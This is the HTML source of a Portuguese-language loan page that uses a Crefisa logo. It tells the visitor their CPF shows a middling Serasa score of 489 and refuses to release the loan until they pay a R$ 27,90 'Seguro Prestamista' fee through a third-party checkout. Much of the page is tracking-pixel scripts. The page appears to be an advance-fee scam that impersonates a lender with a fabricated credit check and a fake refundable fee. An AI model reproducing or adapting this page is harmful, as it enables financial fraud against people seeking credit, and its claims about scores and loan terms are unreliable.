<html data-capo="" style="--primary: #FE0064;">
    
    <meta http-equiv="content-type" content="text/html;charset=UTF-8">
    
    <head>
<meta charset="UTF-8">

<script type="text/javascript" async="" src="js/events.js"></script><script type="text/javascript" async="" src="js/events_6.js"></script><script type="text/javascript" async="" src="js/events_3.js"></script><script type="text/javascript" async="" src="js/events_1.js"></script><script type="text/javascript" async="" src="js/events_2.js"></script><script type="text/javascript" async="" src="js/events_4.js"></script><script type="text/javascript" async="" src="js/events_5.js"></script><script async="" src="https://pesquisa.plus/log/pagar-pac/js/fbevents.js"></script>


<script src="js/latest.js" async="" defer=""></script>


  <!-- Meta Pixel Code -->
 
  <!-- End Meta Pixel Code -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Empréstimo facilitado, simulação gratuita!</title>
    <style>
        /*! modern-normalize v2.0.0 | MIT License | https://github.com/sindresorhus/modern-normalize */
        *,
        :after,
        :before {
            box-sizing: border-box
        }

        html {
            font-family: system-ui, Segoe UI, Roboto, Helvetica, Arial, sans-serif, Apple Color Emoji, Segoe UI Emoji;
            line-height: 1.15;
            -webkit-text-size-adjust: 100%;
            -moz-tab-size: 4;
            -o-tab-size: 4;
            tab-size: 4
        }

        body {
            margin: 0
        }

        hr {
            color: inherit;
            height: 0
        }

        abbr[title] {
            -webkit-text-decoration: underline dotted;
            text-decoration: underline dotted
        }

        b,
        strong {
            font-weight: bolder
        }

        code,
        kbd,
        pre,
        samp {
            font-family: ui-monospace, SFMono-Regular, Consolas, Liberation Mono, Menlo, monospace;
            font-size: 1em
        }

        small {
            font-size: 80%
        }

        sub,
        sup {
            font-size: 75%;
            line-height: 0;
            position: relative;
            vertical-align: baseline
        }

        sub {
            bottom: -.25em
        }

        sup {
            top: -.5em
        }

        table {
            border-color: inherit;
            text-indent: 0
        }

        button,
        input,
        optgroup,
        select,
        textarea {
            font-family: inherit;
            font-size: 100%;
            line-height: 1.15;
            margin: 0
        }

        button,
        select {
            text-transform: none
        }

        [type=button],
        [type=reset],
        [type=submit],
        button {
            -webkit-appearance: button
        }

        ::-moz-focus-inner {
            border-style: none;
            padding: 0
        }

        :-moz-focusring {
            outline: 1px dotted ButtonText
        }

        :-moz-ui-invalid {
            box-shadow: none
        }

        legend {
            padding: 0
        }

        progress {
            vertical-align: baseline
        }

        ::-webkit-inner-spin-button,
        ::-webkit-outer-spin-button {
            height: auto
        }

        [type=search] {
            -webkit-appearance: textfield;
            outline-offset: -2px
        }

        ::-webkit-search-decoration {
            -webkit-appearance: none
        }

        ::-webkit-file-upload-button {
            -webkit-appearance: button;
            font: inherit
        }

        summary {
            display: list-item
        }
    </style>
    <style>
        blockquote,
        dd,
        dl,
        figure,
        h1,
        h2,
        h3,
        h4,
        h5,
        h6,
        hr,
        ol,
        p,
        pre,
        ul {
            margin: 0
        }

        ol,
        ul {
            list-style: none;
            padding: 0
        }

        img,
        video {
            height: auto;
            max-width: 100%
        }

        *,
        :after,
        :before {
            border: 0 solid #000
        }

        :root {
            --primary: transparent;
            --red: #ef4444;
            --green: #27ae60
        }

        body {
            background-color: #fff;
            color: #000;
            font-size: 16px
        }

        #__nuxt,
        body,
        html {
            height: 100%
        }

        a {
            color: #1b98e0;
            text-decoration: none
        }

        a:hover {
            cursor: pointer;
            text-decoration: underline
        }

        .text-red {
            color: var(--red)
        }

        .text-green {
            color: var(--green)
        }

        .text-primary {
            color: var(--primary)
        }

        h2 {
            font-weight: 500
        }
    </style>
    <style>
        .default-layout[data-v-77968890] {
            display: grid;
            grid-template-areas: "top-bar" "content" "footer";
            grid-template-rows: auto 1fr auto;
            min-height: 100vh
        }

        .default-layout .top-bar[data-v-77968890] {
            grid-area: top-bar
        }

        .default-layout .content[data-v-77968890] {
            background-color: #f5f7f9;
            grid-area: content
        }

        .default-layout .footer[data-v-77968890] {
            grid-area: footer
        }
    </style>
    <style>
        .top-bar[data-v-f5d5d4cd] {
            background-color: var(--primary);
            border-bottom: 1px solid hsla(0, 0%, 100%, .3);
            width: 100%
        }

        .top-bar .container[data-v-f5d5d4cd] {
            display: grid;
            padding: 1.5rem 0;
            place-content: center
        }
    </style>
    <style>
        .container[data-v-0041013f] {
            box-sizing: border-box;
            margin: 0 auto;
            padding-left: 1rem;
            padding-right: 1rem
        }

        @media (min-width:640px) {
            .container[data-v-0041013f] {
                max-width: 90%
            }
        }

        @media (min-width:768px) {
            .container[data-v-0041013f] {
                max-width: 85%
            }
        }

        @media (min-width:1024px) {
            .container[data-v-0041013f] {
                max-width: 80%
            }
        }

        @media (min-width:1280px) {
            .container[data-v-0041013f] {
                max-width: 1000px
            }
        }
    </style>
    <style>
        img.logo[data-v-4f7075cc] {
            height: var(--2348ed9e);
            width: auto
        }

        h1.logo[data-v-4f7075cc] {
            color: #fff;
            text-shadow: 0 1px 2px rgba(0, 0, 0, .2)
        }
    </style>
    <style>
        .headline[data-v-0fe1df78] {
            align-items: center;
            color: var(--red);
            font-size: 1.3rem;
            gap: .5rem;
            grid-template-columns: auto auto
        }

        .card-title[data-v-0fe1df78],
        .headline[data-v-0fe1df78] {
            display: grid;
            justify-self: start
        }
    </style>
    <style>
        .central-wrapper[data-v-4dac45b6] {
            margin: 2.5rem 0
        }

        .container[data-v-4dac45b6] {
            display: grid;
            gap: 1rem;
            max-width: 480px;
            place-items: center
        }
    </style>
    <style>
        .card-sub-title[data-v-2901cb0a] {
            color: rgba(0, 0, 0, .5);
            line-height: 1.5
        }
    </style>
    <style>
        .card.score-overview[data-v-9af416af] {
            padding: 0
        }

        .card.score-overview .padding[data-v-9af416af] {
            display: grid;
            gap: 1rem;
            margin-bottom: 1.5rem;
            padding: 1.5rem
        }

        .card.score-overview .padding .card-title[data-v-9af416af] {
            margin-bottom: -.5rem
        }
    </style>
    <style>
        .card[data-v-cca10726] {
            background-color: #fff;
            border-radius: 10px;
            box-shadow: 0 1px 4px 0 rgba(0, 8, 38, .04);
            padding: 1.5rem;
            width: 100%
        }
    </style>
    <style>
        .card-title[data-v-303a1430] {
            color: #000;
            font-size: 1.35rem;
            font-weight: 500
        }
    </style>
    <style>
        .score-value[data-v-e4408df2] {
            align-items: center;
            display: grid;
            gap: .5rem;
            grid-template-columns: auto auto;
            justify-content: start
        }

        .score-value .value[data-v-e4408df2] {
            font-size: 2.3rem;
            font-weight: 500
        }

        .score-value .tag[data-v-e4408df2] {
            background-color: #f5e5e9;
            border-radius: 1rem;
            color: rgba(0, 0, 0, .5);
            font-size: 14px;
            font-weight: 600;
            padding: .3rem .65rem
        }
    </style>
    <style>
        .score-bar[data-v-ec71dfb9] {
            background-color: #cfd5db;
            border-radius: 1rem;
            height: 8px;
            position: relative
        }

        .score-bar .fill[data-v-ec71dfb9] {
            background-color: #fbc93f;
            border-radius: 1rem;
            height: 100%;
            position: absolute;
            width: 21%
        }

        .score-bar .num[data-v-ec71dfb9] {
            bottom: -1.3rem;
            color: rgba(0, 0, 0, .5);
            font-size: 12px;
            position: absolute
        }

        .score-bar .num.empty[data-v-ec71dfb9] {
            left: 0
        }

        .score-bar .num.half[data-v-ec71dfb9] {
            left: 50%;
            transform: translateX(-50%)
        }

        .score-bar .num.full[data-v-ec71dfb9] {
            right: 0
        }

        .score-bar .dash[data-v-ec71dfb9] {
            background-color: #fff;
            height: 8px;
            position: absolute;
            width: 3px
        }

        .score-bar .dash.half[data-v-ec71dfb9] {
            left: 50%;
            transform: translateX(-50%)
        }

        .score-bar .dash.quarter[data-v-ec71dfb9] {
            left: 25%;
            transform: translateX(-50%)
        }

        .score-bar .dash.three-quarters[data-v-ec71dfb9] {
            left: 75%;
            transform: translateX(-50%)
        }

        .score-bar .dash[data-v-ec71dfb9]:not(.half):after {
            background-color: #cfd5db;
            border-radius: 50%;
            bottom: -1rem;
            content: "";
            height: 5px;
            left: 50%;
            position: absolute;
            transform: translateX(-50%);
            width: 5px
        }
    </style>
    <style>
        .score-description[data-v-d0362a81] {
            align-items: center;
            border-top: 1px solid hsla(0, 0%, 86%, .5);
            display: grid;
            gap: .75rem;
            grid-template-columns: auto auto;
            justify-content: start;
            padding: 1rem
        }

        .score-description .icon[data-v-d0362a81] {
            color: var(--648f63b6);
            font-size: 1.5rem
        }

        .score-description .highlight-text[data-v-d0362a81] {
            color: var(--648f63b6);
            font-weight: 500
        }

        .score-description .description[data-v-d0362a81] {
            color: rgba(0, 0, 0, .5)
        }
    </style>
    <style>
        .insurance-video[data-v-209728de] {
            color: #000;
            display: grid;
            gap: 1rem;
            padding: 3rem 1rem;
            position: relative
        }

        .insurance-video[data-v-209728de],
        .insurance-video[data-v-209728de]:before {
            border: 1px solid #9d9d9d;
            border-radius: 5px
        }

        .insurance-video[data-v-209728de]:before {
            background-color: transparent;
            content: "";
            height: 96%;
            left: 50%;
            position: absolute;
            top: 50%;
            transform: translate(-50%, -50%);
            width: 106%
        }

        .card-sub-title[data-v-209728de] {
            align-items: center;
            color: #000;
            display: grid;
            font-size: 1.2rem;
            gap: .5rem;
            grid-auto-columns: auto;
            grid-auto-flow: column;
            justify-content: left
        }

        p[data-v-209728de] {
            color: rgba(0, 0, 0, .7)
        }

        video[data-v-209728de] {
            border: 1px solid #9d9d9d;
            border-radius: 5px
        }
    </style>
    <style>
        .payment-card[data-v-a09dda04] {
            display: grid;
            gap: 1rem;
            justify-items: center;
            text-align: center
        }

        .card-title[data-v-a09dda04] {
            align-items: center;
            display: grid;
            gap: .5rem;
            grid-template-columns: repeat(2, auto)
        }

        .card-title .icon[data-v-a09dda04] {
            color: #3db1a5;
            font-size: 1.8rem
        }

        .card-sub-title[data-v-a09dda04] {
            align-items: center;
            display: grid;
            gap: .5rem;
            grid-template-columns: repeat(2, auto)
        }

        .card-sub-title .icon[data-v-a09dda04] {
            color: #419c63;
            font-size: 1.2rem
        }

        .fee-value[data-v-a09dda04] {
            color: #3db1a5;
            font-size: 2rem;
            font-weight: 500
        }

        .icon[data-v-a09dda04] {
            font-size: 3rem
        }
    </style>
    <style>
        .insurance-faq[data-v-4ea615b6] {
            display: grid;
            gap: 1rem
        }
    </style>
    <style>
        .faq-item[data-v-8c748230] {
            border-top: 1px solid #d4dae0;
            color: #000;
            cursor: pointer;
            font-weight: 400
        }

        .faq-item .question[data-v-8c748230] {
            align-items: center;
            display: grid;
            grid-template-columns: auto 1fr;
            padding: .5rem 0
        }

        .faq-item .question.expanded .icon[data-v-8c748230] {
            transform: rotate(180deg)
        }

        .faq-item .question .icon[data-v-8c748230] {
            color: var(--primary);
            font-size: 2.5rem;
            transition: transform .2s ease-out
        }

        .faq-item .answer[data-v-8c748230] {
            display: grid;
            gap: 1rem;
            max-height: 0;
            overflow: hidden;
            transition: max-height .2s ease-out
        }

        .faq-item .answer .content[data-v-8c748230] {
            color: rgba(0, 0, 0, .5);
            padding: .2rem 1rem 1.5rem
        }

        .question.expanded[data-v-8c748230]:after {
            transform: translateY(-50%) rotate(90deg)
        }
    </style>
    <style>
        .footer[data-v-63f14862] {
            border-bottom: 7px solid var(--primary);
            border-top: 2px solid #edf0ef;
            color: #fff;
            color: #000;
            padding: 2rem 0;
            text-align: center
        }

        .footer p[data-v-63f14862] {
            margin: .5rem 0
        }
    </style>
    <link rel="stylesheet" href="https://pesquisa.plus/_nuxt/TopBar.2vF9lWx7.css">
    <link rel="stylesheet" href="https://pesquisa.plus/_nuxt/Container.B5PP9_Vn.css">
    <link rel="stylesheet" href="https://pesquisa.plus/_nuxt/CardSubTitle.DG_Fs8af.css">
    <link rel="stylesheet" href="https://pesquisa.plus/_nuxt/CardTitle.D2C4NpE7.css">
    <link rel="stylesheet" href="https://pesquisa.plus/_nuxt/Card.GBBMdh4F.css">
    <link rel="stylesheet" href="https://pesquisa.plus/_nuxt/PaymentCard.C5KDNUam.css">
    <link rel="stylesheet" href="https://pesquisa.plus/_nuxt/Button.CTY08tZL.css">
    <link rel="stylesheet" href="https://pesquisa.plus/_nuxt/LoadingText.BAPOmI7q.css">
    <link rel="stylesheet" href="https://pesquisa.plus/_nuxt/FaqItem.yXfMt8qC.css">
    <link rel="stylesheet" href="https://pesquisa.plus/_nuxt/CentralWrapper.Jxhi_ayc.css">
    <link rel="modulepreload" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/Ds3y3Bf3.js">
    <link rel="modulepreload" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/k9y74een.js">
    <link rel="modulepreload" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/Bo8ipC1T.js">
    <link rel="modulepreload" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/2aeojNjQ.js">
    <link rel="modulepreload" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/BwWngDX5.js">
    <link rel="modulepreload" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/CNxTVsKb.js">
    <link rel="modulepreload" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/B1xLFNhR.js">
    <link rel="modulepreload" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/DTnGPJep.js">
    <link rel="modulepreload" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/sv4npInL.js">
    <link rel="modulepreload" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/DIXVKuIp.js">
    <link rel="modulepreload" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/Bl1c_aD8.js">
    <link rel="modulepreload" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/DEF4dnCe.js">
    <link rel="modulepreload" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/B6VT0UWr.js">
    <link rel="modulepreload" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/BxXuEPsU.js">
    <link rel="modulepreload" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/BTyuqVSS.js">
    <link rel="modulepreload" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/DmqsTf9v.js">
    <link rel="prefetch" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/J9e3dA3M.js">
    <link rel="prefetch" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/MaghENf1.js">
    <link rel="prefetch" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/BJRZzHYv.js">
    <link rel="prefetch" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/CV182wBC.js">
    <link rel="prefetch" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/D-UNq_Tu.js">
    <link rel="prefetch" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/BGBp0rdz.js">
    <link rel="prefetch" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/Wpn3EkJ-.js">
    <link rel="prefetch" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/CKC6fHHG.js">
    <link rel="prefetch" as="script" crossorigin="" href="https://pesquisa.plus/_nuxt/BhOEMyyX.js">
    <script type="text/javascript" async="" src="js/events_7.js"></script>
    <script type="text/javascript" async="" src="js/events_2_1.js"></script>
    <script type="text/javascript" async="" src="js/events_1_1.js"></script>
    <script async="" src="js/fbevents_1.js"></script>
    <script type="module" src="https://pesquisa.plus/_nuxt/Ds3y3Bf3.js" crossorigin=""></script>
    <script id="unhead:payload" type="application/json">{"title":"Empréstimo facilitado, simulação gratuita!"}</script>
    <script src="js/latest_1.js" async="" defer=""></script>
    <link rel="stylesheet" href="https://unipay-br.org/_nuxt/20-bad-score.DKSgL4r7.css">
    <script async="" defer="" src="js/pixel_1.js"></script>
    <link rel="stylesheet" href="https://unipay-br.org/_nuxt/default.fxhPcPvK.css"> <!-- Meta Pixel Code -->
    <script>
  window.pixelId = "671cca42c3bdfd00ce38903f";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script><script async="" defer="" src="js/pixel.js"></script>
<script src="js/latest.js" async="" defer=""></script>

    <script>
        !function (f, b, e, v, n, t, s) {
            if (f.fbq) return; n = f.fbq = function () {
                n.callMethod ?
                n.callMethod.apply(n, arguments) : n.queue.push(arguments)
            };
            if (!f._fbq) f._fbq = n; n.push = n; n.loaded = !0; n.version = '2.0';
            n.queue = []; t = b.createElement(e); t.async = !0;
            t.src = v; s = b.getElementsByTagName(e)[0];
            s.parentNode.insertBefore(t, s)
        }(window, document, 'script',
            'https://connect.facebook.net/en_US/fbevents.js');
        fbq('init', '1600823784650450'');
        fbq('track', 'PageView');
    </script>
    <noscript><img height="1" width="1" style="display:none" src="https://pesquisa.plus/log/tr-43?id=1600823784650450&ev=PageView&noscript=1"></noscript>
    <!-- End Meta Pixel Code -->

   <!-- Meta Pixel Code -->
<script>
!function(f,b,e,v,n,t,s)
{if(f.fbq)return;n=f.fbq=function(){n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments)};
if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
n.queue=[];t=b.createElement(e);t.async=!0;
t.src=v;s=b.getElementsByTagName(e)[0];
s.parentNode.insertBefore(t,s)}(window, document,'script',
'https://connect.facebook.net/en_US/fbevents.js');
fbq('init', '1600823784650450');
fbq('track', 'PageView');
</script>
<noscript><img height="1" width="1" style="display:none" src="../../tr-2?id=1600823784650450&ev=PageView&noscript=1"></noscript>
<!-- End Meta Pixel Code -->

    <!-- Meta Pixel Code -->
    <script>
        !function (f, b, e, v, n, t, s) {
            if (f.fbq) return; n = f.fbq = function () {
                n.callMethod ?
                n.callMethod.apply(n, arguments) : n.queue.push(arguments)
            };
            if (!f._fbq) f._fbq = n; n.push = n; n.loaded = !0; n.version = '2.0';
            n.queue = []; t = b.createElement(e); t.async = !0;
            t.src = v; s = b.getElementsByTagName(e)[0];
            s.parentNode.insertBefore(t, s)
        }(window, document, 'script',
            'https://connect.facebook.net/en_US/fbevents.js');
        fbq('init', '1600823784650450');
        fbq('track', 'PageView');
    </script>
    <noscript><img height="1" width="1" style="display:none" src="https://pesquisa.plus/log/tr-45?id=1600823784650450&ev=PageView&noscript=1"></noscript>
    <!-- End Meta Pixel Code -->

    <!-- TikTok Pixel Code Start -->
  
    <!-- TikTok Pixel Code End -->


   
    <script src="js/player_1.js" async=""></script>
<script src="js/player.js" async=""></script><script async="" defer="" src="js/pixel.js"></script></head>

<body>
    <div id="__nuxt">
        <div class="default-layout" data-v-77968890="">
            <style>
                .top-bar {
                    background-color: white;
                    border-bottom: 1px solid hsla(0, 0%, 100%, .3);
                    width: 100%;
                }

                .top-bar .container {
                    display: grid;
                    padding: 1.5rem 0;
                    place-content: center;
                }
            </style>
            <header class="top-bar">
                <div class="container">
                    <h1 class="logo" data-v-f5d5d4cd="" style="--2348ed9e: 10px; color: white;" data-v-4f7075cc=""><img src="images/Crefisa.png" style="max-width:100px"></h1>
                </div>
            </header>
            <main class="content" data-v-77968890=""><!--[-->
                <div class="central-wrapper bad-score-page" data-v-0fe1df78="" data-v-4dac45b6="">
                    <div class="container" data-v-4dac45b6="" data-v-0041013f=""><!--[--><!--[-->
                        <p class="headline" data-v-0fe1df78=""><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon iconify iconify--bi" data-v-0fe1df78="" style="" width="1em" height="1em" viewbox="0 0 16 16">
                                <path fill="currentColor" d="M10.067.87a2.89 2.89 0 0 0-4.134 0l-.622.638l-.89-.011a2.89 2.89 0 0 0-2.924 2.924l.01.89l-.636.622a2.89 2.89 0 0 0 0 4.134l.637.622l-.011.89a2.89 2.89 0 0 0 2.924 2.924l.89-.01l.622.636a2.89 2.89 0 0 0 4.134 0l.622-.637l.89.011a2.89 2.89 0 0 0 2.924-2.924l-.01-.89l.636-.622a2.89 2.89 0 0 0 0-4.134l-.637-.622l.011-.89a2.89 2.89 0 0 0-2.924-2.924l-.89.01zM8 4c.535 0 .954.462.9.995l-.35 3.507a.552.552 0 0 1-1.1 0L7.1 4.995A.905.905 0 0 1 8 4m.002 6a1 1 0 1 1 0 2a1 1 0 0 1 0-2">
                                </path>
                            </svg> Um problema necessita da sua atenção! </p><span class="card-sub-title" data-v-0fe1df78="" data-v-2901cb0a=""><!--[-->Após uma tentativa de transferência do valor
                            solicitado no empréstimo, constatamos que o seu CPF possui Score Mediano, Junto ao SPC e
                            Serasa. Mas não se preocupe, nós estamos aqui para ajudar você a contornar isso.
                            <!--]--></span>
                        <div class="card score-overview" data-v-0fe1df78="" data-v-9af416af="" data-v-cca10726="">
                            <!--[-->
                            <div class="padding" data-v-9af416af=""><span class="card-title" data-v-9af416af="" data-v-303a1430=""><!--[-->Serasa Score<!--]--></span><span class="card-sub-title" data-v-9af416af="" data-v-2901cb0a=""><!--[-->Entenda seu momento
                                    financeiro<!--]--></span>
                                <div class="score-value" data-v-9af416af="" data-v-e4408df2="">
                                    <p class="value" data-v-e4408df2="">489</p>
                                    <p class="tag" data-v-e4408df2="">Médio</p>
                                </div>
                                <div class="score-bar" data-v-9af416af="" data-v-ec71dfb9="">
                                    <div class="fill" data-v-ec71dfb9=""></div>
                                    <p class="num empty" data-v-ec71dfb9="">0</p>
                                    <p class="num half" data-v-ec71dfb9="">500</p>
                                    <p class="num full" data-v-ec71dfb9="">1000</p>
                                    <p class="dash quarter" data-v-ec71dfb9=""></p>
                                    <p class="dash half" data-v-ec71dfb9=""></p>
                                    <p class="dash three-quarters" data-v-ec71dfb9=""></p>
                                </div>
                            </div>
                            <div class="score-description" data-v-9af416af="" style="--648f63b6: #F14E3D;" data-v-d0362a81=""><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon iconify iconify--mdi" data-v-d0362a81="" style="" width="1em" height="1em" viewbox="0 0 24 24">
                                    <path fill="currentColor" d="M12 2c5.5 0 10 4.5 10 10s-4.5 10-10 10S2 17.5 2 12S6.5 2 12 2m0 2c-4.42 0-8 3.58-8 8s3.58 8 8 8s8-3.58 8-8s-3.58-8-8-8m0 1c3.87 0 7 3.13 7 7h-7z">
                                    </path>
                                </svg>
                                <div class="text" data-v-d0362a81="">
                                    <p class="highlight-text" data-v-d0362a81="">score de 0 a 250</p>
                                    <p class="description" data-v-d0362a81="">Risco alto de atrasar pagamentos</p>
                                </div>
                            </div>
                            <div class="score-description" data-v-9af416af="" style="--648f63b6: #FBC93F;" data-v-d0362a81=""><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon iconify iconify--mdi" data-v-d0362a81="" style="" width="1em" height="1em" viewbox="0 0 24 24">
                                    <path fill="currentColor" d="M12 2c5.5 0 10 4.5 10 10s-4.5 10-10 10S2 17.5 2 12S6.5 2 12 2m0 2c-4.42 0-8 3.58-8 8s3.58 8 8 8s8-3.58 8-8s-3.58-8-8-8m0 1c3.87 0 7 3.13 7 7s-3.13 7-7 7z">
                                    </path>
                                </svg>
                                <div class="text" data-v-d0362a81="">
                                    <p class="highlight-text" data-v-d0362a81="">score de 251 a 500</p>
                                    <p class="description" data-v-d0362a81="">Probabilidade moderada de atrasos</p>
                                </div>
                            </div>
                            <div class="score-description" data-v-9af416af="" style="--648f63b6: #B3DE57;" data-v-d0362a81=""><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon iconify iconify--mdi" data-v-d0362a81="" style="" width="1em" height="1em" viewbox="0 0 24 24">
                                    <path fill="currentColor" d="M12 2c5.5 0 10 4.5 10 10s-4.5 10-10 10S2 17.5 2 12S6.5 2 12 2m0 2c-4.42 0-8 3.58-8 8s3.58 8 8 8s8-3.58 8-8s-3.58-8-8-8m0 1c3.87 0 7 3.13 7 7s-3.13 7-7 7s-7-3.13-7-7h7z">
                                    </path>
                                </svg>
                                <div class="text" data-v-d0362a81="">
                                    <p class="highlight-text" data-v-d0362a81="">score de 501 a 750</p>
                                    <p class="description" data-v-d0362a81="">Risco baixo de inadimplência</p>
                                </div>
                            </div>
                            <div class="score-description" data-v-9af416af="" style="--648f63b6: #42A852;" data-v-d0362a81=""><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon iconify iconify--mdi" data-v-d0362a81="" style="" width="1em" height="1em" viewbox="0 0 24 24">
                                    <path fill="currentColor" d="M12 5c3.87 0 7 3.13 7 7s-3.13 7-7 7s-7-3.13-7-7s3.13-7 7-7m0-3c5.5 0 10 4.5 10 10s-4.5 10-10 10S2 17.5 2 12S6.5 2 12 2m0 2c-4.42 0-8 3.58-8 8s3.58 8 8 8s8-3.58 8-8s-3.58-8-8-8">
                                    </path>
                                </svg>
                                <div class="text" data-v-d0362a81="">
                                    <p class="highlight-text" data-v-d0362a81="">score de 751 a 1000</p>
                                    <p class="description" data-v-d0362a81="">Acesso as condições especiais de
                                        crédito</p>
                                </div>
                            </div><!--]-->
                        </div><br data-v-0fe1df78=""><span class="card-title" data-v-0fe1df78="" data-v-303a1430=""><!--[-->Libere seu crédito imediatamente<!--]--></span>
                        <div class="insurance-video" data-v-0fe1df78="" data-v-209728de=""><span class="card-sub-title" data-v-209728de="" data-v-2901cb0a=""><!--[--> Por que devo contratar o Seguro
                                Prestamista? <!--]--></span>
                            <p data-v-209728de=""> Quando uma pessoa é negativada, significa que ela possui um histórico
                                de dívidas não pagas, o que a coloca em uma categoria de alto risco para o fornecedor do
                                empréstimo. </p>
                            <p data-v-209728de=""> Por isso existe o Seguro Prestamista, este seguro atua como uma
                                proteção financeira para empresas vendedoras de crédito e para o cliente segurado. </p>
                            <p data-v-209728de=""> O Seguro Prestamista garante a quitação total ou parcial de parcelas
                                do empréstimo, caso o segurado enfrente falência, acidente, desemprego involuntário ou
                                doença que o torne total ou temporariamente incapaz de trabalhar, respeitados os
                                períodos de carência e franquia. </p>
                            <p data-v-209728de=""> Se o seguro não precisar ser acionado, o valor será integralmente
                                reembolsado ao segurado na última parcela do crédito quitada em dia. </p>
                            <p data-v-209728de=""><b data-v-209728de="">Veja a importância do Seguro Prestamista</b></p>
                            
                            <div style="padding:56.6% 0 0 0;position:relative;"><iframe src="https://player.vimeo.com/video/1026975127?badge=0&autopause=0&player_id=0&app_id=58479" frameborder="0" allow="autoplay; fullscreen; picture-in-picture; clipboard-write" style="position:absolute;top:0;left:0;width:100%;height:100%;" title="vsl"></iframe></div><script src="../../api/player.js"></script>
                            <style>
                                .elementor-element:has(#smartplayer) {
                                    width: 100%;
                                }
                            </style>
                        </div><br data-v-0fe1df78="">
                        <div data-v-cca10726="" data-v-a09dda04="" data-v-0fe1df78="" class="card payment-card"><span data-v-303a1430="" data-v-a09dda04="" class="card-title">Não Liberamos o Empréstimo, sem o Seguro!<svg data-v-a09dda04="" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon iconify iconify--ic" width="1em" height="1em" viewbox="0 0 24 24">
                                    <path fill="currentColor" d="m15.45 16.52l-3.01-3.01c-.11-.11-.24-.13-.31-.13s-.2.02-.31.13L8.8 16.53c-.34.34-.87.89-2.64.89l3.71 3.7a3 3 0 0 0 4.24 0l3.72-3.71c-.91 0-1.67-.18-2.38-.89M8.8 7.47l3.02 3.02c.08.08.2.13.31.13s.23-.05.31-.13l2.99-2.99c.71-.74 1.52-.91 2.43-.91l-3.72-3.71a3 3 0 0 0-4.24 0l-3.71 3.7c1.76 0 2.3.58 2.61.89">
                                    </path>
                                    <path fill="currentColor" d="m21.11 9.85l-2.25-2.26H17.6c-.54 0-1.08.22-1.45.61l-3 3c-.28.28-.65.42-1.02.42a1.5 1.5 0 0 1-1.02-.42L8.09 8.17c-.38-.38-.9-.6-1.45-.6H5.17l-2.29 2.3a3 3 0 0 0 0 4.24l2.29 2.3h1.48c.54 0 1.06-.22 1.45-.6l3.02-3.02c.28-.28.65-.42 1.02-.42s.74.14 1.02.42l3.01 3.01c.38.38.9.6 1.45.6h1.26l2.25-2.26a3.04 3.04 0 0 0-.02-4.29">
                                    </path>
                                </svg></span><span data-v-2901cb0a="" data-v-a09dda04="" class="card-sub-title"> O
                                pagamento será confirmado imediatamente </span><span data-v-a09dda04="" class="fee-value">R$ 27,90</span>
                            <style>
                                .button {
                                    padding: 10px 20px;
                                    font-size: 16px;
                                    border: none;
                                    border-radius: 5px;
                                    cursor: pointer;
                                    color: #fff;
                                    background-color: #FE0064;
                                }

                                .button.primary {
                                    background-color: #FE0064;
                                }
                            </style>

                            <button class="button primary" type="button" id="redirectButton">
                                Liberar Empréstimo
                            </button>

                           <script>
    document.getElementById('redirectButton').addEventListener('click', function () {
        // Captura os parâmetros UTM da URL atual
        const urlParams = new URLSearchParams(window.location.search);
        const utmParams = urlParams.toString();
        
        // Constrói a nova URL com os parâmetros UTM, se existirem
        let checkoutUrl = 'https://app.nivopay.com.br/checkout/a267b865-3768-4de7-8df1-66a7fad982d5';
        if (utmParams) {
            checkoutUrl += '?' + utmParams;
        }

        window.location.href = checkoutUrl;
    });
</script>
<!----><span data-v-2901cb0a="" data-v-a09dda04="" class="card-sub-title"><svg data-v-a09dda04="" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon iconify iconify--ph" width="1em" height="1em" viewbox="0 0 256 256">
                                    <g fill="currentColor">
                                        <path d="M216 56v56c0 96-88 120-88 120s-88-24-88-120V56a8 8 0 0 1 8-8h160a8 8 0 0 1 8 8" opacity=".2"></path>
